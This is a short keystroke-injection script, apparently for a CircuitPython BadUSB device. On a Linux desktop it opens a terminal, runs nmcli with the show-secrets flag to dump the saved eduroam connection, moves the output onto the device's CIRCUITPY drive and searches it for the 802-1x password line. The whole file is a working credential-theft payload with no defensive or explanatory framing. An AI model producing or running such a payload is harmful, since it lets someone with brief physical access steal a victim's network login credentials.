DELAY 1500
ESC
DELAY 500
ALT F2
DELAY 1500
DELETE
DELAY 1500
STRING terminal
DELAY 1500
ENTER
DELAY 1500
STRING nmcli -s connection show eduroam > networkPassword.txt
DELAY 1500
ENTER
DELAY 1500
ALT F2
DELAY 1500
DELETE
DELAY 1500
STRING CIRCUITPY
DELAY 1500
ENTER
DELAY 1500
ALT F4
DELAY 1500
STRING mv networkPassword.txt /media/$USER/CIRCUITPY/
DELAY 1500
ENTER
DELAY 1500
STRING nano /media/$USER/CIRCUITPY/networkPassword.txt
DELAY 1500
ENTER
DELAY 1500
CTRL W
DELAY 1500
STRING 802-1x.password:
DELAY 1500
ENTER
